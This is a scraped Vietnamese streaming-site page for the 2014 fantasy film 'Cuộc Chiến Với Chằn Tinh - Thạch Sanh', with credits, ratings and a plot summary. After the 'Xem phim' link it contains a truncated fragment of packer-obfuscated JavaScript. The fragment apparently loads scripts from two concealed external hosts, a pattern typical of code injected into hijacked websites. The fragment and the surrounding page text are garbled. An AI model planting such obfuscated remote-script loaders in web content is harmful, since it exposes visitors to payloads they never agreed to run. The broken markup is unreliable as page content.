Banner C1

Phim

Cuộc Chiến Với Chằn Tinh - Thạch Sanh

Xem Phim Cuộc Chiến Với Chằn Tinh
125757 lượt xem

HD Phim Chiếu Rạp MớiPhim Dã Sữ Phim Việt Nam

Đạo Diễn: Đỗ Quang Hải Âu

Thời lượng: 90 Phút

Năm phát hành: 2014

Xem phimXem TrailerTải Phim

4.3
126 Star | 29 Rates
  • Các Diễn Viên Trong Phim
  • Nội Dung Phim

Cuộc Chiến Với Chằn Tinh Thần Thoại Thạch Sanh là câu chuyện cổ tích ngắn liền với tuổi thơ của không ít người kể về anh chàng dũng cảm gan dạ và nhân hậu tên Thạch Sanh. Nhưng khi dựng thì phim Thạch Sanh này thì lối dẫn chuyện, tính cách nhân vật thậm chí là 1 chút và cốt truyện sẽ khác đi 1 chút để tạo nên nét mới mẻ và hấp dẫn riêng. Phim Thạch Sanh vẫn xoay quanh mối tình đẹp đẽ giữa anh chàng dũng sĩ Thạch Sanh và công chúa Quỳnh Nga khi hai người họ ở hai giai cấp khác nhau.
Bên cạnh đó Phim Cuộc Chiến Với Chằn Tinh được sử dụng công nghệ cũng như kĩ xảo của 3D hứa hẹn những cảnh quay hành động đánh đấm sẽ thu hút khán giả bởi hình ảnh đẹp và chuyên nghiệp. Tuy nhiên Phim Cuộc Chiến Với Chằn Tinh cũng gặp không ít khó khăn khi ngày công chiếu phải lùi lại nhiều lần vì công việc hậu kì làm khán giả nóng lòng chờ đợi. Chúc các bạn xem phim vui vẻ!.

Cuộc Chiến Với Chằn Tinh

Xem phim '\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$.0(\'2://8.3.1/5/6/7/g.9\');$.0(\'2://b.c.1/a/d.e?f=4\')',17,17,'
  • Trailer Phim
8.6
29
  • Phim Cùng Thể Loại

BÌNH LUẬN PHIM : Cuộc Chiến Với Chằn Tinh

Banner C1

User Online
Banner C1
Banner C1